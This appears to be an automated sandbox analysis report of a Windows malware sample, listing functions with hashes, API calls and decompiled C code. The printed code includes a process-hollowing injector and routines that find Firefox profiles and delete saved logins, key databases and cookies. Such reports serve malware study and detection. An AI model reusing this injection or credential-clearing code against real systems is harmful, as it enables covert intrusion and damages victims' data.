                                    • Opcode Fuzzy Hash: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                                    • Instruction Fuzzy Hash: 89E0ED22A0941061E629323E7C4176B02668BC677DF21132BF528C62C2EFBC488381AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402D0D, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                    • Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
                                    • Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                    • Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448354, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0043F348: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
                                    • _free.LIBCMT ref: 004483C0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                                    • Instruction ID: 60c65a57f4404dc7eec93e126a54dda1ba11399514c1d014c30e87a140478a45
                                    • Opcode Fuzzy Hash: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                                    • Instruction Fuzzy Hash: 8C01D6722003456BF3218E6A984195EFBE9EB85374F25052EE98493280EB35A905C768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00422179, Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                                    • WSAGetLastError.WS2_32 ref: 0042219B
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID:
                                    • API String ID: 2514157807-0
                                    • Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                    • Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
                                    • Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                    • Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043F348, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                                    • Instruction ID: 680b6e8bc4c2fa124abf68bcdd5a812fa191381f72dfdd1accecd8568f1e318d
                                    • Opcode Fuzzy Hash: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                                    • Instruction Fuzzy Hash: 8AF0E931A00321AADF216A639C45B5B3788AF4D7B1F15A037FC04DB690DA3CDC5986ED
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004221EA, Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                                    • WSAGetLastError.WS2_32 ref: 0042220C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID:
                                    • API String ID: 1802528911-0
                                    • Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                    • Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
                                    • Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                    • Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043F98C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                    • Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
                                    • Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                    • Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040498B, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                                      • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Startupsocket
                                    • String ID:
                                    • API String ID: 3996037109-0
                                    • Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                    • Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
                                    • Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                    • Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004049DE, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                    • Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
                                    • Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                    • Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0042226A, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                    • Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
                                    • Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                    • Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0041412B, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E0041412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						L00431F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x41433b
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}























                                    0x00414131
                                    0x0041413a
                                    0x0041413d
                                    0x00414143
                                    0x00414150
                                    0x00414158
                                    0x00414162
                                    0x0041416b
                                    0x00414170
                                    0x0041417a
                                    0x0041417c
                                    0x0041417d
                                    0x0041417e
                                    0x00414198
                                    0x00414322
                                    0x00414322
                                    0x00414324
                                    0x00414326
                                    0x00000000
                                    0x00414326
                                    0x004141a7
                                    0x004141ac
                                    0x004141b1
                                    0x004141c4
                                    0x004141c7
                                    0x004141ca
                                    0x004141d0
                                    0x004141db
                                    0x00414301
                                    0x00414305
                                    0x00414313
                                    0x00414315
                                    0x00414318
                                    0x0041431e
                                    0x0041431f
                                    0x00414320
                                    0x00414321
                                    0x00000000
                                    0x00414203
                                    0x00414203
                                    0x00414209
                                    0x0041420e
                                    0x0041420e
                                    0x00414223
                                    0x00414229
                                    0x0041422e
                                    0x00000000
                                    0x00414234
                                    0x00414234
                                    0x00414248
                                    0x00000000
                                    0x00000000
                                    0x0041424e
                                    0x00414258
                                    0x004142a2
                                    0x004142a5
                                    0x004142a8
                                    0x004142ad
                                    0x004142d5
                                    0x004142dc
                                    0x004142e2
                                    0x004142ed
                                    0x00000000
                                    0x00000000
                                    0x004142ef
                                    0x004142fb
                                    0x00000000
                                    0x00000000
                                    0x004142fd
                                    0x00000000
                                    0x004142fd
                                    0x004142c0
                                    0x004142c8
                                    0x00000000
                                    0x00000000
                                    0x004142cd
                                    0x00000000
                                    0x004142cd
                                    0x0041425a
                                    0x0041425c
                                    0x0041425f
                                    0x0041425f
                                    0x00414284
                                    0x0041428d
                                    0x00414290
                                    0x00414295
                                    0x00414298
                                    0x0041429b
                                    0x0041429e
                                    0x00000000
                                    0x0041425f
                                    0x0041422e
                                    0x004141db
                                    0x0041415a
                                    0x00000000
                                    0x0041415a
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;CA
                                    • API String ID: 0-233881251
                                    • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                    • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                                    • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                    • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E0040A012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020D5(__ebx,  &_v100);
				E004020D5(__ebx,  &_v76);
				E004020D5(__ebx,  &_v28);
				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FD1( &_v28, _t46, _t135, L004075C2(_t89,  &_v52, L0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				L00401FC7();
				L00401FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
				L00401FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									L00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									L00401FC7();
									L00401FC7();
									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									L00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									L00401FC7();
									L00401FC7();
									_t73 = DeleteFileA(L00401F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					L0040A6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					L0040A6EF(_t89,  &_v28, _t143);
					L17:
					L00401FC7();
					L00401FC7();
					L00401FC7();
					return 1;
				}
			}

























                                    0x0040a012
                                    0x0040a012
                                    0x0040a012
                                    0x0040a01f
                                    0x0040a027
                                    0x0040a02f
                                    0x0040a03c
                                    0x0040a05c
                                    0x0040a064
                                    0x0040a06c
                                    0x0040a07d
                                    0x0040a09a
                                    0x0040a09c
                                    0x0040a0a1
                                    0x0040a0a4
                                    0x0040a1da
                                    0x0040a1da
                                    0x0040a1e8
                                    0x0040a1ea
                                    0x00000000
                                    0x00000000
                                    0x0040a0cd
                                    0x0040a0d4
                                    0x00000000
                                    0x00000000
                                    0x0040a0da
                                    0x0040a0e0
                                    0x0040a0e3
                                    0x0040a0f1
                                    0x0040a0f1
                                    0x0040a0f7
                                    0x0040a0f7
                                    0x0040a0f9
                                    0x0040a0f9
                                    0x0040a0fd
                                    0x0040a102
                                    0x0040a105
                                    0x0040a10b
                                    0x00000000
                                    0x00000000
                                    0x0040a10d
                                    0x0040a10e
                                    0x0040a111
                                    0x00000000
                                    0x00000000
                                    0x0040a113
                                    0x0040a11c
                                    0x0040a11c
                                    0x0040a11e
                                    0x0040a14e
                                    0x0040a156
                                    0x0040a161
                                    0x0040a17e
                                    0x0040a190
                                    0x0040a19b
                                    0x0040a1a3
                                    0x0040a1b1
                                    0x0040a1b7
                                    0x0040a1b9
                                    0x0040a1bb
                                    0x0040a1bb
                                    0x0040a1ca
                                    0x0040a1d0
                                    0x0040a1d2
                                    0x0040a1d4
                                    0x0040a1d4
                                    0x0040a1d2
                                    0x00000000
                                    0x0040a11e
                                    0x0040a117
                                    0x0040a119
                                    0x0040a119
                                    0x00000000
                                    0x0040a119
                                    0x0040a0e9
                                    0x0040a0eb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040a0eb
                                    0x0040a1fa
                                    0x0040a1ff
                                    0x0040a208
                                    0x00000000
                                    0x0040a0aa
                                    0x0040a0ab
                                    0x0040a0bb
                                    0x0040a0c0
                                    0x0040a20e
                                    0x0040a211
                                    0x0040a219
                                    0x0040a221
                                    0x0040a22c
                                    0x0040a22c

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                                    • FindClose.KERNEL32(00000000), ref: 0040A0AB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                                    • FindClose.KERNEL32(00000000), ref: 0040A208
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                                    • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                                    • Opcode Fuzzy Hash: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                                    • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E0040A22D(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020D5(0,  &_v52);
				E004020D5(0,  &_v28);
				_t35 = E00402084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FD1( &_v28, _t36, _t109, L004075C2(0,  &_v76, L0043988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				L00401FC7();
				L00401FC7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401F95(E00407558( &_v100,  &_v28, _t116, "*")),  &_v444);
				L00401FC7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						L0040A6EF(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E00407558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											L00401FD1( &_v52, _t59, _t110, E00405343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											L00401FC7();
											L00401FC7();
											__eflags = DeleteFileA(L00401F95( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402084(0, _t102);
					L0040A6EF(0, _t104, _t117);
					L18:
				}
				L19:
				L00401FC7();
				L00401FC7();
				return 1;
			}

























                                    0x0040a22d
                                    0x0040a22d
                                    0x0040a23b
                                    0x0040a243
                                    0x0040a250
                                    0x0040a270
                                    0x0040a278
                                    0x0040a280
                                    0x0040a291
                                    0x0040a2ae
                                    0x0040a2b0
                                    0x0040a2b5
                                    0x0040a2b8
                                    0x0040a2eb
                                    0x0040a2ed
                                    0x0040a3b9
                                    0x0040a3c3
                                    0x0040a3c8
                                    0x0040a3d1
                                    0x00000000
                                    0x0040a2f3
                                    0x0040a2f3
                                    0x0040a2f5
                                    0x0040a2f5
                                    0x0040a2fc
                                    0x00000000
                                    0x0040a302
                                    0x0040a302
                                    0x0040a308
                                    0x0040a30b
                                    0x0040a319
                                    0x0040a319
                                    0x0040a31f
                                    0x0040a321
                                    0x0040a321
                                    0x0040a325
                                    0x0040a32a
                                    0x0040a32d
                                    0x0040a333
                                    0x00000000
                                    0x00000000
                                    0x0040a335
                                    0x0040a336
                                    0x0040a339
                                    0x00000000
                                    0x0040a33b
                                    0x0040a33b
                                    0x0040a33b
                                    0x0040a344
                                    0x0040a344
                                    0x0040a346
                                    0x00000000
                                    0x0040a348
                                    0x0040a360
                                    0x0040a36f
                                    0x0040a377
                                    0x0040a37f
                                    0x0040a393
                                    0x0040a395
                                    0x0040a3fd
                                    0x0040a3ff
                                    0x00000000
                                    0x0040a397
                                    0x0040a397
                                    0x0040a39e
                                    0x0040a3a1
                                    0x0040a3f2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040a3a1
                                    0x0040a395
                                    0x00000000
                                    0x0040a346
                                    0x0040a33f
                                    0x0040a341
                                    0x0040a341
                                    0x00000000
                                    0x0040a30d
                                    0x0040a311
                                    0x0040a313
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040a313
                                    0x0040a30b
                                    0x00000000
                                    0x0040a3a3
                                    0x0040a3b1
                                    0x0040a3b1
                                    0x00000000
                                    0x0040a2f5
                                    0x0040a2ba
                                    0x0040a2bb
                                    0x0040a2c4
                                    0x0040a2c6
                                    0x0040a2cb
                                    0x0040a2cb
                                    0x0040a2d0
                                    0x0040a3d7
                                    0x0040a3d7
                                    0x0040a3d9
                                    0x0040a3dc
                                    0x0040a3e4
                                    0x0040a3f0

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
